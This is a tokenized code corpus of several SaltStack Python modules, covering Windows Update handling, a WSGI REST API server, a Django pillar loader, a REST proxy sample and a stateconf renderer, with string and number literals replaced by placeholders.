PyWinUpdater ( object ) : <EOL> def __init__ ( self , categories = None , skipUI = True , skipDownloaded = False , <EOL> skipInstalled = True , skipReboot = False , skipPresent = False , <EOL> skipSoftwareUpdates = False , skipDriverUpdates = False , skipHidden = True ) : <EOL> log . debug ( '<STR_LIT>' ) <EOL> pythoncom . CoInitialize ( ) <EOL> self . skipUI = skipUI <EOL> self . skipDownloaded = skipDownloaded <EOL> self . skipInstalled = skipInstalled <EOL> self . skipReboot = skipReboot <EOL> self . skipPresent = skipPresent <EOL> self . skipHidden = skipHidden <EOL> self . skipSoftwareUpdates = skipSoftwareUpdates <EOL> self . skipDriverUpdates = skipDriverUpdates <EOL> self . categories = categories <EOL> self . foundCategories = [ ] <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . update_session = win32com . client . Dispatch ( '<STR_LIT>' ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . win_searcher = self . update_session . CreateUpdateSearcher ( ) <EOL> self . download_collection = win32com . client . Dispatch ( '<STR_LIT>' ) <EOL> self . install_collection = win32com . client . Dispatch ( '<STR_LIT>' ) <EOL> self . win_downloader = self . update_session . CreateUpdateDownloader ( ) <EOL> self . win_downloader . Updates = self . download_collection <EOL> self . win_installer = self . update_session . CreateUpdateInstaller ( ) <EOL> self . win_installer . Updates = self . install_collection <EOL> self . download_results = None <EOL> self . install_results = None <EOL> self . search_results = None <EOL> def Search ( self , searchString ) : <EOL> try : <EOL> log . debug ( '<STR_LIT>' . format ( searchString ) ) <EOL> self . search_results = self . win_searcher . Search ( searchString ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> log . debug ( '<STR_LIT>' . format ( <EOL> self . search_results . Updates . Count ) ) <EOL> try : <EOL> for update in self . search_results . Updates : <EOL> if update . InstallationBehavior . CanRequestUserInput : <EOL> log . debug ( <STR_LIT> . format ( update . title ) ) <EOL> continue <EOL> if self . skipDownloaded and update . IsDownloaded : <EOL> log . debug ( u'<STR_LIT>' . format ( update . title ) ) <EOL> continue <EOL> for category in update . Categories : <EOL> if self . categories is None or category . Name in self . categories : <EOL> self . download_collection . Add ( update ) <EOL> log . debug ( u'<STR_LIT>' . format ( update . title ) ) <EOL> break <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . foundCategories = _gather_update_categories ( self . download_collection ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( self . foundCategories ) ) ) <EOL> return True <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> def AutoSearch ( self ) : <EOL> '''<STR_LIT>''' <EOL> search_string = '<STR_LIT>' <EOL> searchParams = [ ] <EOL> if self . skipInstalled : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> else : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> if self . skipHidden : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> else : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> if self . skipReboot : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> else : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> if self . skipPresent : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> else : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> for i in searchParams : <EOL> search_string += '<STR_LIT>' . format ( i ) <EOL> if not self . skipSoftwareUpdates and not self . skipDriverUpdates : <EOL> search_string += '<STR_LIT>' <EOL> elif not self . skipSoftwareUpdates : <EOL> search_string += '<STR_LIT>' <EOL> elif not self . skipDriverUpdates : <EOL> search_string += '<STR_LIT>' <EOL> else : <EOL> return False <EOL> log . debug ( '<STR_LIT>' . format ( search_string ) ) <EOL> return self . Search ( search_string ) <EOL> def Download ( self ) : <EOL> try : <EOL> if self . download_collection . Count != <NUM_LIT:0> : <EOL> self . download_results = self . win_downloader . Download ( ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> return True <EOL> except Exception as exc : <EOL> log . debug ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> def Install ( self ) : <EOL> try : <EOL> for update in self . search_results . Updates : <EOL> if update . IsDownloaded : <EOL> self . install_collection . Add ( update ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> try : <EOL> for update in self . search_results . Updates : <EOL> if not update . EulaAccepted : <EOL> log . debug ( u'<STR_LIT>' . format ( update . Title ) ) <EOL> update . AcceptEula ( ) <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> if self . install_collection . Count != <NUM_LIT:0> : <EOL> log . debug ( '<STR_LIT>' ) <EOL> try : <EOL> self . install_results = self . win_installer . Install ( ) <EOL> log . info ( '<STR_LIT>' ) <EOL> return True <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> else : <EOL> log . info ( '<STR_LIT>' ) <EOL> return True <EOL> def GetInstallationResults ( self ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( self . install_collection . Count ) ) <EOL> if self . install_collection . Count == <NUM_LIT:0> : <EOL> return { } <EOL> updates = [ ] <EOL> log . debug ( '<STR_LIT>' ) <EOL> for i in range ( self . install_collection . Count ) : <EOL> updates . append ( '<STR_LIT>' . format ( <EOL> self . install_results . GetUpdateResult ( i ) . ResultCode , <EOL> self . install_collection . Item ( i ) . Title ) ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> results = { } <EOL> for i , update in enumerate ( updates ) : <EOL> results [ '<STR_LIT>' . format ( i ) ] = update <EOL> log . debug ( '<STR_LIT>' ) <EOL> return results <EOL> def GetInstallationResultsPretty ( self ) : <EOL> '''<STR_LIT>''' <EOL> updates = self . GetInstallationResults ( ) <EOL> ret = '<STR_LIT>' <EOL> for i in updates : <EOL> ret += '<STR_LIT>' . format ( updates [ i ] ) <EOL> return ret <EOL> def GetDownloadResults ( self ) : <EOL> updates = [ ] <EOL> for i in range ( self . download_collection . Count ) : <EOL> updates . append ( '<STR_LIT>' . format ( <EOL> str ( self . download_results . GetUpdateResult ( i ) . ResultCode ) , <EOL> str ( self . download_collection . Item ( i ) . Title ) ) ) <EOL> results = { } <EOL> for i , update in enumerate ( updates ) : <EOL> results [ '<STR_LIT>' . format ( i ) ] = update <EOL> return results <EOL> def GetSearchResultsVerbose ( self ) : <EOL> updates = [ ] <EOL> log . debug ( '<STR_LIT>' . format ( <EOL> self . download_collection . count ) ) <EOL> for update in self . download_collection : <EOL> if update . InstallationBehavior . CanRequestUserInput : <EOL> log . debug ( u'<STR_LIT>' . format ( update . title ) ) <EOL> continue <EOL> update_com_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> simple_enums = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> update_dict = { } <EOL> for f in update_com_fields : <EOL> v = getattr ( update , f ) <EOL> if not any ( [ isinstance ( v , bool ) , isinstance ( v , str ) ] ) : <EOL> if f in simple_enums : <EOL> v = [ x for x in v ] <EOL> elif f == '<STR_LIT>' : <EOL> v = [ { '<STR_LIT:Name>' : cat . Name , '<STR_LIT>' : cat . Description } for cat in v ] <EOL> elif f == '<STR_LIT>' : <EOL> continue <EOL> elif f == '<STR_LIT>' : <EOL> v = { '<STR_LIT>' : v . RevisionNumber , <EOL> '<STR_LIT>' : v . UpdateID } <EOL> update_dict [ f ] = v <EOL> updates . append ( update_dict ) <EOL> log . debug ( u'<STR_LIT>' . format ( update . title ) ) <EOL> return updates <EOL> def GetSearchResults ( self , fields = None ) : <EOL> """<STR_LIT>""" <EOL> updates_verbose = self . GetSearchResultsVerbose ( ) <EOL> if fields is not None : <EOL> updates = [ dict ( ( k , v ) for k , v in update . items ( ) if k in fields ) <EOL> for update in updates_verbose ] <EOL> return updates <EOL> return [ update [ '<STR_LIT>' ] for update in updates_verbose ] <EOL> def SetCategories ( self , categories ) : <EOL> self . categories = categories <EOL> def GetCategories ( self ) : <EOL> return self . categories <EOL> def GetAvailableCategories ( self ) : <EOL> return self . foundCategories <EOL> def SetSkips ( self , skips ) : <EOL> if skips : <EOL> for i in skips : <EOL> value = i [ next ( i . iterkeys ( ) ) ] <EOL> skip = next ( i . iterkeys ( ) ) <EOL> self . SetSkip ( skip , value ) <EOL> log . debug ( '<STR_LIT>' . format ( skip , value ) ) <EOL> def SetSkip ( self , skip , state ) : <EOL> if skip == '<STR_LIT>' : <EOL> self . skipUI = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipDownloaded = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipInstalled = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipReboot = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipPresent = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipHidden = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipSoftwareUpdates = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipDriverUpdates = state <EOL> log . debug ( '<STR_LIT>' . format ( <EOL> self . skipUI , self . skipDownloaded , self . skipInstalled , self . skipReboot , <EOL> self . skipPresent , self . skipHidden , self . skipSoftwareUpdates , self . skipDriverUpdates ) ) <EOL> def __str__ ( self ) : <EOL> results = '<STR_LIT>' . format ( <EOL> self . download_collection . count ) <EOL> for category in self . foundCategories : <EOL> count = <NUM_LIT:0> <EOL> for update in self . download_collection : <EOL> for cat in update . Categories : <EOL> if category == cat . Name : <EOL> count += <NUM_LIT:1> <EOL> results += '<STR_LIT>' . format ( category , count ) <EOL> return results <EOL> def _search ( quidditch , retries = <NUM_LIT:5> ) : <EOL> '''<STR_LIT>''' <EOL> passed = False <EOL> clean = True <EOL> comment = '<STR_LIT>' <EOL> while not passed : <EOL> log . debug ( '<STR_LIT>' . format ( retries ) ) <EOL> passed = quidditch . AutoSearch ( ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( passed ) ) ) <EOL> if isinstance ( passed , Exception ) : <EOL> clean = False <EOL> comment += '<STR_LIT>' . format ( passed ) <EOL> retries -= <NUM_LIT:1> <EOL> if retries : <EOL> comment += '<STR_LIT>' . format ( str ( retries ) ) <EOL> else : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , True , retries ) <EOL> passed = False <EOL> if clean : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , True , retries ) <EOL> def _download ( quidditch , retries = <NUM_LIT:5> ) : <EOL> '''<STR_LIT>''' <EOL> passed = False <EOL> clean = True <EOL> comment = '<STR_LIT>' <EOL> while not passed : <EOL> log . debug ( '<STR_LIT>' . format ( str ( retries ) ) ) <EOL> passed = quidditch . Download ( ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( passed ) ) ) <EOL> if isinstance ( passed , Exception ) : <EOL> clean = False <EOL> comment += '<STR_LIT>' . format ( str ( passed ) ) <EOL> retries -= <NUM_LIT:1> <EOL> if retries : <EOL> comment += '<STR_LIT>' . format ( str ( retries ) ) <EOL> passed = False <EOL> else : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , False , retries ) <EOL> if clean : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , True , retries ) <EOL> def _install ( quidditch , retries = <NUM_LIT:5> ) : <EOL> '''<STR_LIT>''' <EOL> passed = False <EOL> clean = True <EOL> comment = '<STR_LIT>' <EOL> while not passed : <EOL> log . debug ( '<STR_LIT>' . format ( str ( quidditch . install_collection . Count ) ) ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( retries ) ) ) <EOL> passed = quidditch . Install ( ) <EOL> log . info ( '<STR_LIT>' . format ( str ( passed ) ) ) <EOL> if isinstance ( passed , Exception ) : <EOL> clean = False <EOL> comment += '<STR_LIT>' . format ( str ( passed ) ) <EOL> retries -= <NUM_LIT:1> <EOL> if retries : <EOL> comment += '<STR_LIT>' . format ( str ( retries ) ) <EOL> passed = False <EOL> else : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , False , retries ) <EOL> if clean : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , True , retries ) <EOL> def list_updates ( verbose = False , fields = None , skips = None , retries = <NUM_LIT:5> , categories = None ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( str ( categories ) ) ) <EOL> updates = PyWinUpdater ( ) <EOL> if categories : <EOL> updates . SetCategories ( categories ) <EOL> updates . SetSkips ( skips ) <EOL> comment , passed , retries = _search ( updates , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( verbose ) ) ) <EOL> if verbose : <EOL> return updates . GetSearchResultsVerbose ( ) <EOL> return updates . GetSearchResults ( fields = fields ) <EOL> def download_updates ( skips = None , retries = <NUM_LIT:5> , categories = None ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( str ( categories ) ) ) <EOL> quidditch = PyWinUpdater ( skipDownloaded = True ) <EOL> quidditch . SetCategories ( categories ) <EOL> quidditch . SetSkips ( skips ) <EOL> comment , passed , retries = _search ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> comment , passed , retries = _download ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> try : <EOL> comment = quidditch . GetDownloadResults ( ) <EOL> except Exception as exc : <EOL> comment = u'<STR_LIT>' . format ( exc ) <EOL> return u'<STR_LIT>' . format ( comment ) <EOL> def install_updates ( skips = None , retries = <NUM_LIT:5> , categories = None ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( str ( categories ) ) ) <EOL> quidditch = PyWinUpdater ( ) <EOL> quidditch . SetCategories ( categories ) <EOL> quidditch . SetSkips ( skips ) <EOL> comment , passed , retries = _search ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> comment , passed , retries = _download ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> comment , passed , retries = _install ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> try : <EOL> comment = quidditch . GetInstallationResultsPretty ( ) <EOL> except Exception as exc : <EOL> comment = '<STR_LIT>' . format ( exc ) <EOL> return '<STR_LIT>' . format ( comment ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import errno <EOL> import json <EOL> import logging <EOL> import os <EOL> import salt <EOL> import salt . netapi <EOL> H = { <EOL> <NUM_LIT:200> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> __virtualname__ = '<STR_LIT>' <EOL> logger = logging . getLogger ( __virtualname__ ) <EOL> def __virtual__ ( ) : <EOL> mod_opts = __opts__ . get ( __virtualname__ , { } ) <EOL> if '<STR_LIT:port>' in mod_opts : <EOL> return __virtualname__ <EOL> return False <EOL> class HTTPError ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , code , message ) : <EOL> self . code = code <EOL> Exception . __init__ ( self , '<STR_LIT>' . format ( code , message ) ) <EOL> def mkdir_p ( path ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> os . makedirs ( path ) <EOL> except OSError as exc : <EOL> if exc . errno == errno . EEXIST and os . path . isdir ( path ) : <EOL> pass <EOL> else : <EOL> raise <EOL> def read_body ( environ ) : <EOL> '''<STR_LIT>''' <EOL> length = environ . get ( '<STR_LIT>' , '<STR_LIT:0>' ) <EOL> length = <NUM_LIT:0> if length == '<STR_LIT>' else int ( length ) <EOL> return environ [ '<STR_LIT>' ] . read ( length ) <EOL> def get_json ( environ ) : <EOL> '''<STR_LIT>''' <EOL> content_type = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if content_type != '<STR_LIT:application/json>' : <EOL> raise HTTPError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> try : <EOL> return json . loads ( read_body ( environ ) ) <EOL> except ValueError as exc : <EOL> raise HTTPError ( <NUM_LIT> , exc ) <EOL> def get_headers ( data , extra_headers = None ) : <EOL> '''<STR_LIT>''' <EOL> response_headers = { <EOL> '<STR_LIT>' : str ( len ( data ) ) , <EOL> } <EOL> if extra_headers : <EOL> response_headers . update ( extra_headers ) <EOL> return list ( response_headers . items ( ) ) <EOL> def run_chunk ( environ , lowstate ) : <EOL> '''<STR_LIT>''' <EOL> client = environ [ '<STR_LIT>' ] <EOL> for chunk in lowstate : <EOL> yield client . run ( chunk ) <EOL> def dispatch ( environ ) : <EOL> '''<STR_LIT>''' <EOL> method = environ [ '<STR_LIT>' ] . upper ( ) <EOL> if method == '<STR_LIT:GET>' : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif method == '<STR_LIT:POST>' : <EOL> data = get_json ( environ ) <EOL> return run_chunk ( environ , data ) <EOL> else : <EOL> raise HTTPError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> def saltenviron ( environ ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in locals ( ) : <EOL> import salt . config <EOL> __opts__ = salt . config . client_config ( <EOL> os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> environ [ '<STR_LIT>' ] = __opts__ <EOL> environ [ '<STR_LIT>' ] = salt . netapi . NetapiClient ( __opts__ ) <EOL> def application ( environ , start_response ) : <EOL> '''<STR_LIT>''' <EOL> saltenviron ( environ ) <EOL> try : <EOL> resp = list ( dispatch ( environ ) ) <EOL> code = <NUM_LIT:200> <EOL> except HTTPError as exc : <EOL> code = exc . code <EOL> resp = str ( exc ) <EOL> except salt . exceptions . EauthAuthenticationError as exc : <EOL> code = <NUM_LIT> <EOL> resp = str ( exc ) <EOL> except Exception as exc : <EOL> code = <NUM_LIT> <EOL> resp = str ( exc ) <EOL> try : <EOL> ret = json . dumps ( { '<STR_LIT>' : resp } ) <EOL> except TypeError as exc : <EOL> code = <NUM_LIT> <EOL> ret = str ( exc ) <EOL> start_response ( H [ code ] , get_headers ( ret , { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' , <EOL> } ) ) <EOL> return ( ret , ) <EOL> def get_opts ( ) : <EOL> '''<STR_LIT>''' <EOL> import salt . config <EOL> return salt . config . client_config ( <EOL> os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def start ( ) : <EOL> '''<STR_LIT>''' <EOL> from wsgiref . simple_server import make_server <EOL> if '<STR_LIT>' not in globals ( ) : <EOL> globals ( ) [ '<STR_LIT>' ] = get_opts ( ) <EOL> if __virtual__ ( ) is False : <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> mod_opts = __opts__ . get ( __virtualname__ , { } ) <EOL> httpd = make_server ( '<STR_LIT:localhost>' , mod_opts [ '<STR_LIT:port>' ] , application ) <EOL> try : <EOL> httpd . serve_forever ( ) <EOL> except KeyboardInterrupt : <EOL> raise SystemExit ( <NUM_LIT:0> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> start ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import os <EOL> import sys <EOL> import salt . exceptions <EOL> import salt . ext . six as six <EOL> import salt . utils <EOL> HAS_VIRTUALENV = False <EOL> try : <EOL> import virtualenv <EOL> HAS_VIRTUALENV = True <EOL> except ImportError : <EOL> pass <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return True <EOL> def ext_pillar ( minion_id , <EOL> pillar , <EOL> pillar_name , <EOL> project_path , <EOL> settings_module , <EOL> django_app , <EOL> env = None , <EOL> env_file = None , <EOL> * args , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . isdir ( project_path ) : <EOL> log . error ( '<STR_LIT>' . format ( <EOL> project_path ) ) <EOL> return { } <EOL> if HAS_VIRTUALENV and env is not None and os . path . isdir ( env ) : <EOL> for path in virtualenv . path_locations ( env ) : <EOL> if not os . path . isdir ( path ) : <EOL> log . error ( '<STR_LIT>' . format ( path ) ) <EOL> return { } <EOL> sys . path . insert ( <NUM_LIT:0> , <EOL> os . path . join ( <EOL> virtualenv . path_locations ( env ) [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' ) ) <EOL> sys . path . append ( project_path ) <EOL> os . environ [ '<STR_LIT>' ] = settings_module <EOL> if env_file is not None : <EOL> import subprocess <EOL> base_env = { } <EOL> proc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ] , stdout = subprocess . PIPE ) <EOL> for line in proc . stdout : <EOL> ( key , _ , value ) = salt . utils . to_str ( line ) . partition ( '<STR_LIT:=>' ) <EOL> base_env [ key ] = value <EOL> command = [ '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' . format ( env_file ) ] <EOL> proc = subprocess . Popen ( command , stdout = subprocess . PIPE ) <EOL> for line in proc . stdout : <EOL> ( key , _ , value ) = salt . utils . to_str ( line ) . partition ( '<STR_LIT:=>' ) <EOL> if key not in base_env or base_env [ key ] != value : <EOL> os . environ [ key ] = value . rstrip ( '<STR_LIT:\n>' ) <EOL> log . debug ( '<STR_LIT>' . format ( <EOL> key , <EOL> value . rstrip ( '<STR_LIT:\n>' ) ) ) <EOL> try : <EOL> from django . db . models . loading import get_model <EOL> django_pillar = { } <EOL> for proj_app , models in six . iteritems ( django_app ) : <EOL> _ , _ , app = proj_app . rpartition ( '<STR_LIT:.>' ) <EOL> django_pillar [ app ] = { } <EOL> for model_name , model_meta in six . iteritems ( models ) : <EOL> model_orm = get_model ( app , model_name ) <EOL> if model_orm is None : <EOL> raise salt . exceptions . SaltException ( <EOL> "<STR_LIT>" <EOL> . format ( app , model_name ) ) <EOL> pillar_for_model = django_pillar [ app ] [ model_orm . __name__ ] = { } <EOL> name_field = model_meta [ '<STR_LIT:name>' ] <EOL> fields = model_meta [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in model_meta : <EOL> qs = ( model_orm . objects <EOL> . filter ( ** model_meta [ '<STR_LIT>' ] ) <EOL> . values ( * fields ) ) <EOL> else : <EOL> qs = model_orm . objects . values ( * fields ) <EOL> for model in qs : <EOL> if name_field not in model : <EOL> raise salt . exceptions . SaltException ( <EOL> "<STR_LIT>" . format ( <EOL> name_field ) ) <EOL> if model [ name_field ] in pillar_for_model : <EOL> raise salt . exceptions . SaltException ( <EOL> "<STR_LIT>" . format ( <EOL> model [ name_field ] ) ) <EOL> pillar_for_model [ model [ name_field ] ] = model <EOL> return { pillar_name : django_pillar } <EOL> except ImportError as e : <EOL> log . error ( '<STR_LIT>' . format ( str ( e ) ) ) <EOL> return { } <EOL> except Exception as e : <EOL> log . error ( '<STR_LIT>' . format ( str ( e ) ) ) <EOL> log . debug ( '<STR_LIT>' , exc_info = True ) <EOL> return { } </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import salt . utils . http <EOL> __proxyenabled__ = [ '<STR_LIT>' ] <EOL> CONFIG = { } <EOL> CONFIG_BASE_URL = '<STR_LIT>' <EOL> log = logging . getLogger ( __file__ ) <EOL> def __virtual__ ( ) : <EOL> return True <EOL> def init ( opts ) : <EOL> '''<STR_LIT>''' <EOL> if CONFIG_BASE_URL in opts [ '<STR_LIT>' ] : <EOL> CONFIG [ CONFIG_BASE_URL ] = opts [ '<STR_LIT>' ] [ CONFIG_BASE_URL ] <EOL> else : <EOL> log . error ( '<STR_LIT>' , CONFIG_BASE_URL ) <EOL> log . debug ( '<STR_LIT>' , CONFIG ) <EOL> def ping ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> response = salt . utils . http . query ( <EOL> "<STR_LIT>" . format ( CONFIG [ CONFIG_BASE_URL ] ) , <EOL> decode_type = '<STR_LIT>' , <EOL> decode = True , <EOL> ) <EOL> log . debug ( <EOL> '<STR_LIT>' , <EOL> response , <EOL> ) <EOL> if '<STR_LIT>' in response : <EOL> return True <EOL> except Exception as ex : <EOL> log . error ( <EOL> '<STR_LIT>' , <EOL> CONFIG [ CONFIG_BASE_URL ] , <EOL> ex , <EOL> ) <EOL> return False <EOL> def shutdown ( opts ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import re <EOL> import getopt <EOL> import copy <EOL> from os import path as ospath <EOL> import salt . utils <EOL> from salt . exceptions import SaltRenderError <EOL> import salt . ext . six as six <EOL> from salt . ext . six . moves import StringIO <EOL> __all__ = [ '<STR_LIT>' ] <EOL> log = logging . getLogger ( __name__ ) <EOL> __opts__ = { <EOL> '<STR_LIT>' : r'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> STATE_FUNC = STATE_NAME = '<STR_LIT>' <EOL> def __init__ ( opts ) : <EOL> global STATE_NAME , STATE_FUNC <EOL> STATE_FUNC = __opts__ [ '<STR_LIT>' ] <EOL> STATE_NAME = STATE_FUNC . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> MOD_BASENAME = ospath . basename ( __file__ ) <EOL> INVALID_USAGE_ERROR = SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '''<STR_LIT>''' . format ( MOD_BASENAME , MOD_BASENAME ) <EOL> ) <EOL> def render ( input , saltenv = '<STR_LIT>' , sls = '<STR_LIT>' , argline = '<STR_LIT>' , ** kws ) : <EOL> gen_start_state = False <EOL> no_goal_state = False <EOL> implicit_require = False <EOL> def process_sls_data ( data , context = None , extract = False ) : <EOL> sls_dir = ospath . dirname ( sls . replace ( '<STR_LIT:.>' , ospath . sep ) ) if '<STR_LIT:.>' in sls else sls <EOL> ctx = dict ( sls_dir = sls_dir if sls_dir else '<STR_LIT:.>' ) <EOL> if context : <EOL> ctx . update ( context ) <EOL> tmplout = render_template ( <EOL> StringIO ( data ) , saltenv , sls , context = ctx , <EOL> argline = rt_argline . strip ( ) , ** kws <EOL> ) <EOL> high = render_data ( tmplout , saltenv , sls , argline = rd_argline . strip ( ) ) <EOL> return process_high_data ( high , extract ) <EOL> def process_high_data ( high , extract ) : <EOL> data = copy . deepcopy ( high ) <EOL> try : <EOL> rewrite_single_shorthand_state_decl ( data ) <EOL> rewrite_sls_includes_excludes ( data , sls , saltenv ) <EOL> if not extract and implicit_require : <EOL> sid = has_names_decls ( data ) <EOL> if sid : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( sid ) <EOL> ) <EOL> add_implicit_requires ( data ) <EOL> if gen_start_state : <EOL> add_start_state ( data , sls ) <EOL> if not extract and not no_goal_state : <EOL> add_goal_state ( data ) <EOL> rename_state_ids ( data , sls ) <EOL> extract_state_confs ( data ) <EOL> except SaltRenderError : <EOL> raise <EOL> except Exception as err : <EOL> log . exception ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( sls , err ) <EOL> ) <EOL> from salt . state import State <EOL> state = State ( __opts__ ) <EOL> errors = state . verify_high ( high ) <EOL> if errors : <EOL> raise SaltRenderError ( '<STR_LIT:\n>' . join ( errors ) ) <EOL> raise SaltRenderError ( '<STR_LIT>' ) <EOL> return data <EOL> renderers = kws [ '<STR_LIT>' ] <EOL> opts , args = getopt . getopt ( argline . split ( ) , '<STR_LIT>' ) <EOL> argline = '<STR_LIT:U+0020>' . join ( args ) if args else '<STR_LIT>' <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in opts : <EOL> no_goal_state = True <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in opts : <EOL> implicit_require = True <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in opts : <EOL> gen_start_state = True <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in opts : <EOL> data = process_high_data ( input , extract = False ) <EOL> else : <EOL> args = [ <EOL> arg . strip ( ) . replace ( '<STR_LIT>' , '<STR_LIT:.>' ) <EOL> for arg in re . split ( r'<STR_LIT>' , argline , <NUM_LIT:1> ) <EOL> ] <EOL> try : <EOL> name , rd_argline = ( args [ <NUM_LIT:0> ] + '<STR_LIT:U+0020>' ) . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) <EOL> render_data = renderers [ name ] <EOL> if implicit_require : <EOL> if name == '<STR_LIT>' : <EOL> rd_argline = '<STR_LIT>' + rd_argline <EOL> else : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> name , rt_argline = ( args [ <NUM_LIT:1> ] + '<STR_LIT:U+0020>' ) . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) <EOL> render_template = renderers [ name ] <EOL> except KeyError as err : <EOL> raise SaltRenderError ( '<STR_LIT>' . format ( err ) ) <EOL> except IndexError : <EOL> raise INVALID_USAGE_ERROR <EOL> if isinstance ( input , six . string_types ) : 